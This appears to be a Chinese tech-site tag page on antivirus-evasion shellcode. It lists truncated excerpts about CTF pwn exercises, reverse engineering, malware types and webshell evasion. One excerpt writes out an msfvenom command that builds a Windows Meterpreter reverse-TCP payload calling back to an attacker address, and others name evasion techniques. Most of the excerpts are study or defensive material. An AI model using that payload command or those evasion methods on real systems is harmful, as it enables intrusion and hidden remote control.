E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
免杀Shellcode
BUUCTF-PWN-[第五空间2019 决赛]PWN5
这题考到格式化字符串的方法我之前没有学过根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护nx打开所以无法写入
shellcode
现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计发现输入名字他会返回名字然后再输入密码如果密码和
双层小牛堡
·
2023-04-20 10:17
PWN的学习
安全
Windows逆向安全(一)之基础知识(一)
前言逆向是一种新型的思维模式也是软件开发领域中极为重要的技术,涵盖各种维度去深挖软件架构的本质和操作系统原理,学习逆向后可以在各领域中发挥至关重要的作用,其中包括黑灰色,安全开发,客户端安全,物联网,车联网,游戏安全,红队
免杀
等行业中绘制出更高的闪光点
私ははいしゃ敗者です
·
2023-04-19 12:22
Windows逆向
windows
安全
逆向
网络安全
远控
免杀
学习笔记-msfvenom自带
免杀
未处理的payloadmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.211.55.2LPORT=3333-fexe-opayload1.exe生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下msf⾃编码处理使⽤msfvenom--listencoders可查看所有编码器msfvenom--l
仲瑿
·
2023-04-19 01:58
远控免杀
学习
安全防御笔记
4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反
翠花。
·
2023-04-18 07:11
安全
笔记
SROP学习 smallest & ciscn_s_3
SigreturnOrientedProgramming)于2014年被VrijeUniversiteitAmsterdam的ErikBosman提出,其相关研究FramingSignals—AReturntoPortable
Shellcode
Red-Leaves
·
2023-04-18 05:34
Pwn
python
linux
网络安全
学习
网络
PWN-ret2
shellcode
原理
我们之前做过很简单的pwn题目buuctf-rip这种是在程序中存在
shellcode
直接返回地址改为这个
shellcode
的地址即可但是如果程序里面没有呢这种类型就是ret2
shellcode
常见的
shellcode
shellcode
双层小牛堡
·
2023-04-17 18:09
PWN的学习
笔记
CTFHUB-PWN-ret2
shellcode
PWN常用命令_猫疼玩AI的博客-CSDN博客几个大方向的思路:没有PIE:ret2libcNX关闭:ret2
shellcode
其他思路:ret2csu、ret2text【程序本身有
shellcode
】
双层小牛堡
·
2023-04-17 18:09
PWN的学习
开发语言
漏洞中的一些名词
shellcode
exploit解释:-
shellcode
:通称缓冲区溢出攻击中植入进程的代码,这段代码可以是出于恶作剧的目的弹出一个消息框,也可以是出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行等
1Oin0
·
2023-04-17 15:25
问题总结 IDS、恶意软件、反病毒网关、APT、对称加密、非对称加密、SSL
4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7
安全的水晶
·
2023-04-17 13:32
ssl
服务器
https
[样本分析初体验] Parite家族感染型病毒
文章目录样本信息样本行为详细分析病毒主体解密
ShellCode
ShellCode
主体病毒DLL脱壳DllEntryPoint感染过程总结分析样本信息MD5:b4964c8ac85b1e428c9eefe572237b21
哎呀呀呀浅汐
·
2023-04-17 09:04
样本分析
安全
应急之木马查杀
黑客长期对自己的后门、病毒进行
免杀
处理。有关
免杀
技术介绍:http://baike.baidu.com/view/706274.htm当病毒文件隐藏时我们就要借用ark系列工具创
卿酌南烛_b805
·
2023-04-16 12:16
恶意软件及反病毒学习总结
目录恶意软件特征恶意软件分类按照传播方式分类病毒蠕虫木马按照功能分类后门勒索挖矿恶意代码的
免杀
技术特征码文件
免杀
改特征码
免杀
原理花指令
免杀
原理加壳
免杀
内存
免杀
行为
免杀
反病毒技术单机反病毒检测工具杀毒软件网关反病毒反病毒网关工作流程配置过程恶意软件恶意软件包括任何有损用户利益的软件
喜乐有分享
·
2023-04-16 03:25
病毒
安全
ctf-wiki ret2syscall
总觉得自己没有一个完整的知识体系栈溢出时候,可以考虑系统调用的用法这个学期学了操作系统,对于系统调用认知又上了一步用户态和内核态的区别用户态的进程execve族函数,int80h的中断号三个参数(binsh,0,0)写
shellcode
poxlove3
·
2023-04-15 17:20
网络安全之防病毒网关
目录网络安全之防病毒网关恶意软件按照传播方式分类病毒蠕虫木马按照功能分类后门勒索挖矿恶意代码的特征下载特征后门特征信息收集特征自身感染特性文件感染特性网络攻击特性病毒威胁场景病毒传播途径电子信息网络共享P2P系统漏洞广告其他恶意代码的
免杀
技术原理文件
免杀
原理改特征码
免杀
原理花指令
免杀
原理加壳
免杀
原理内存
免杀
原理行为
免杀
反病毒技术单机反病毒网关反病毒反病毒工作原理首包检测技术启发式检测技术文件信誉监
White乄joker
·
2023-04-15 08:33
网络安全
web安全
安全
网络
恶意软件及反病毒的一些知识
按照传播方式分类按照功能分类恶意软件的
免杀
技术有哪些?文件
免杀
内存
免杀
行为
免杀
反病毒技术有哪些?单击反病毒网关反病毒反病毒网关的工作原理反病毒网关的工作过程是什么?反病毒网关的配置流程是什么?
流年ꦿ
·
2023-04-15 07:23
安全防御
web安全
安全防御之反病毒网关
3.1按传播方式分类3.2按功能分类4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?8.反病毒网关的配置流程是什么?
一根木棍
·
2023-04-15 05:35
安全防御
安全
恶意软件
蠕虫
防火墙
WAF攻防-权限控制&代码
免杀
&异或运算&变量覆盖&混淆加密&传参
文章目录基础-脚本后门控制原理-代码解释原理-脚本后门查杀机制-函数&行为代码-脚本后门
免杀
变异-覆盖&传参代码-脚本后门
免杀
变异-异或&加密拓展-脚本后门脚本类型-JSP&ASPXwebshell检测平台
今天是 几 号
·
2023-04-13 23:22
Cyber-Security
php
python
开发语言
waf
黑客的读后感
黑客商业化,黑色产业链已经很成熟:
免杀
,盗号,挂马,黑站,传播病毒……这一切让我们吃惊,让我们的黑客精神不复存在。黑客在普通民众心中已经成为邪恶的代名词。黑客已经失去最初那种纯粹的技术追求,探索发现的
陈湘江
·
2023-04-13 15:25
攻防演练-某地级市HW攻防测试演练红队渗透测试总结
某地级市HW攻防演练红队渗透测试总结文章目录某地级市HW攻防演练红队渗透测试总结前言一、对某目标攻击的复盘1.Web打点2.上
免杀
马反弹shell(Failed)3.信息收集,数据库提权4.拿下数据库云服务器
炫彩@之星
·
2023-04-13 02:31
攻防演练
安全性测试
web安全
安全
一道题展开的UPX脱壳问题
http://ite.hznu.edu.cn/challenges#esay%20signin-84)UPX是一个著名的压缩壳,主要功能是压缩PE文件(比如exe,dll等文件),有时候也可能被病毒用于
免杀
cool breeze☆
·
2023-04-11 14:07
网络安全
TryHackMe-红队-20_Anti-Virus规避:
Shellcode
Anti-VirusEvasion:
Shellcode
学习
shellcode
编码、打包、活页夹和加密器。在这个房间里,我们将探讨如何构建和交付有效载荷,重点是避免被常见的AV引擎检测到。
Sugobet
·
2023-04-10 09:38
windows
TryHackMe
免杀
AV规避
红队
day110 自动化部署的shell脚本
code里面执行下面命令#
[email protected]
:/demo.gitCDATE=$(date"+%Y-%m-%d")CTIME=$(date"+%Y-%m-%d-%H-%M")#
SHELLCODE
5不忘初心0
·
2023-04-08 20:12
IDS、恶意软件、反病毒网关、APT与密码学
恶意软件与反病毒技术1、什么是恶意软件2、恶意软件的特征3、恶意软件的分类4、恶意软件的
免杀
技术有哪些5、反病毒技术有哪些?6、反病毒网关的工作原理7、反病毒网关的工作过程是什么?8、反病毒
戊戌怀夏
·
2023-04-08 00:49
笔记
密码学
安全
【网络安全防御 防御病毒与密码浅学】
1.病毒2.蠕虫3.木马4.间谍软件5.勒索软件6.恐吓软件7.Bots8.Rootkits9.混合恶意软件4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?
Fanyuning
·
2023-04-08 00:47
ssl
https
网络
网络安全问答
4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?8.反病毒网关的配置流程是什么?9.什么是APT?10.APT的攻击过程?
ISMOTO
·
2023-04-07 19:41
安全
ssl
https
远控
免杀
学习笔记-msfvenom工具介绍(一)
msfvenom简介msfvenom是msfpayload和msfencode的结合体,于2015年6⽉8⽇取代了msfpayload和msfencode。在此之后,metasploit-framework下⾯的的msfpayload(荷载⽣成器),msfencoder(编码器),msfcli(监听接⼝)都不再被⽀持常规参数-p,–payload指定需要使用的payload(攻击荷载)。也可以使用
仲瑿
·
2023-04-06 15:15
学习
安全
远控
免杀
学习笔记-基础篇(二)
免杀
技术介绍1.修改特征码
免杀
的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是⾏为特征,只要破坏了病毒与⽊⻢所固有的特征,并保证其原有功能没有改变,⼀次
免杀
就能完成了。
仲瑿
·
2023-04-06 15:14
学习
远控
免杀
学习笔记-msfvenom工具介绍(二)
⽌假session防⽌session意外退出handler后台持续监听payload的可持续化各平台payload⽣成⼆进制windowsLinuxMacAndroidPowershellNetcat
Shellcode
仲瑿
·
2023-04-06 15:59
远控免杀
学习
安全
记一次weblogic反序列化到内网域控上线
命令执行,这里想到了三种上线法子,上传webshell、powershell上线、frp
免杀
上远程桌
pikeboom
·
2023-04-05 18:06
【众亦信安】专栏
weblogic
网络安全
内网渗透
《伯罗奔尼撒战争史》与《战国策》札记(三十一)
秦孝公封商君,孝公死,而后不
免杀
之。秦惠王封冉子,惠王死,而后王夺之。公孙鞅,功臣也;冉子,亲姻也。然而不免夺死者,封近故也。太公望封于齐,邵公奭封于燕,为其远王室矣。
刘子曰_b08e
·
2023-04-05 03:15
JSP webshell
免杀
——JSP的基础
唉,每次开启JSP都要好一会儿。话说我也不知道为啥,我的每次开启条件一次比一次苛刻。一开始必应就可以打开,再后来只能由谷歌打开,现在可好了得开着代理用谷歌才能进去。一个JSP页面可由5种元素组合而成(1)普通的HTML标记和JavaScript标记,CSS。(2)JSP标记,如指令标记、动作标记。标记符号之间声明变量,定义方法以及定义类。标记符号的内容习惯上放在JSP页面指令之后,之前,也可以写在
正在过坎
·
2023-04-04 05:33
小白入坑
JSP
前端
html
JSP webshell
免杀
——webshell
免杀
结果我
免杀
跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。
正在过坎
·
2023-04-04 05:33
小白入坑
安全
java
servlet
人活着就有意义
人活着就有意义每个人都有存在的价值和意义河流的意义生的愿力,万物众生皆在道里哪怕一只鸡鸭,一条鱼,虾,一只猪,一头牛“今天吞噬您的力量,同样有更强大的无形力量回吃自身,能化解便化解,能不杀便不杀,若不到非杀不可的时候…”国外开始推行对死刑犯“
免杀
南溪向南北歌流海
·
2023-04-04 02:06
在win7 x64下做个简单的内核绘制
基本流程如下:1.在内核中hook相关shadowSSDT或SSDT函数;2.在目标进程申请内存,写入用于D3D9绘制的
shellcode
;3.利用APC的力量回到用户模式,执行用于D3D9绘制的
shellcode
看雪学院
·
2023-04-03 22:21
关于dll注入方式的学习(全局钩子注入)
然而实际上,我们可以以其他的多种形式注入代码(正如恶意软件中所常见的,任意PE文件,
shellcode
代码/程序集等)。全局钩子注入在Windows大部分应用都是基于
网络安全你我他
·
2023-04-03 13:25
学习
windows
网络安全
安全
Windows 10 内核漏洞利用防护及其绕过方法
Windows101607和1703版本中引⼊的针对内核漏洞利⽤的防护措施,在此基础上将给出相应的绕过⽅案,从⽽使我们能够重新获得内核态下的RWprimitives,并进⼀步实现KASLR绕过以及内核中
shellcode
看雪学院
·
2023-04-02 00:20
IDS反病毒与APT的具体介绍
4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什
鸥神仙
·
2023-04-01 18:10
防御
安全
网络安全
2022第六届蓝帽杯初赛writeup
2022第六届蓝帽杯初赛writeupPWNEscape
Shellcode
MISCdomainhackerdomainhacker2电子取证手机取证_1手机取证_2计算机取证_1计算机取证_2计算机取证
小蓝同学`
·
2023-04-01 15:23
CTF
WP
蓝帽杯
网警
CTF
电子取证
CobaltStrike之宏钓鱼及
shellcode
实验详细
文章目录预备知识实验目的实验地址实验环境实验步骤一启动cs服务器客户端连入服务器生成office宏病毒利用宏病毒上线CS生成宏文件利用成功实验步骤二实验步骤三预备知识CobaltStrike是一款渗透测试神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStr
渗透测试小白
·
2023-04-01 13:12
漏洞复现
服务器
windows
linux
CobaltStrike
宏病毒攻击
河马php一句话木马,一句话木马的套路
0x01前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL
免杀
技巧。
男爵兔
·
2023-04-01 13:31
河马php一句话木马
sqlmap绕过d盾_WEBSHELL
免杀
绕过WAF思路&方法(一)
本文主要介绍WEBSHELL
免杀
绕过的思路与方法,网上很多的方法基本都被安全厂家加入了检测规则已经不能
免杀
,所以我们要了解我们主要对手WAF的检测技术,故基于前人优秀基础上我们需要有能力衍生出
免杀
马,WEBSHELL
weixin_39599830
·
2023-04-01 13:58
sqlmap绕过d盾
waf过滤了危险字符串
渗透自学(一)基础知识
DNS缓存投毒:解析恶意地址脚本语言类型:javaweb(适合中大网站)、.php(适合小网站)、.asp、aspx、.jsp、.pl、.py、.cgi(国外常用)后门:webshell,文件上传、更改
免杀
ecnOXong
·
2023-04-01 13:41
web安全
45_webshell绕waf
webshell绕waf两种方式:对webshell所在文件进行扫描静态文件查杀当连接webshell时安全狗会对连接的通讯包进行扫描流量查杀一、webshell编写我们之前在应急响应的时候学过webshll
免杀
的生成
Beilay()
·
2023-04-01 13:02
渗透测试总结
php
服务器
开发语言
webshell 常见 Bypass waf 技巧总结
在渗透学习的过程中,总会遇到各种情况,例如php大马被waf拦截的时候,那么如何制作
免杀
phpwebshell呢,接下来就由我带各位小伙伴们一起踏上大马
免杀
之路,不喜勿喷。
bandongshen9543
·
2023-04-01 12:18
php
Armv8-A架构安全特性总结
一般用于配置数据段不可执行,防止数据段注入可执行的
shellcode
。
magicse7en
·
2023-04-01 09:25
ARM
Armv8-A
Security
[网络安全]第三次作业
4.恶意软件的
免杀
技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?1.什么是APT?2.
君の名280
·
2023-04-01 01:22
安全
远控
免杀
从入门到实践 (11) 终结篇
《远控
免杀
从入门到实践》系列文章目录:1、远控
免杀
从入门到实践(1)基础篇2、远控
免杀
从入门到实践(2)工具总结篇3、远控
免杀
从入门到实践(3)代码篇-C/C++4、远控
免杀
从入门到实践(4)代码篇-C
扶苏゜
·
2023-03-31 04:41
Exp3
免杀
原理与实践
20155332《网络对抗》Exp3
免杀
原理与实践1.实验环境联想台式机一台,安装有win10系统,作为靶机进行实测安装的kali虚拟机,作为攻击机kali虚拟机安装有veil-evasion(听说安装过程比较复杂
weixin_33716941
·
2023-03-31 04:34
《网络攻防》实验三:
免杀
原理与实践
《网络攻防》实验三:
免杀
原理与实践世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以出售自己编制的电脑软件为生
weixin_33720956
·
2023-03-31 04:33
运维
操作系统
c/c++
免杀
技术
一、基础知识1.杀软是如何检测出恶意代码的?(1)检测特征码人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。(2)启发式恶意软件检测如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。(3)基于行为检测与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程,如
weixin_30553837
·
2023-03-31 04:03
上一页
6
7
8
9
10
11
12
13
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他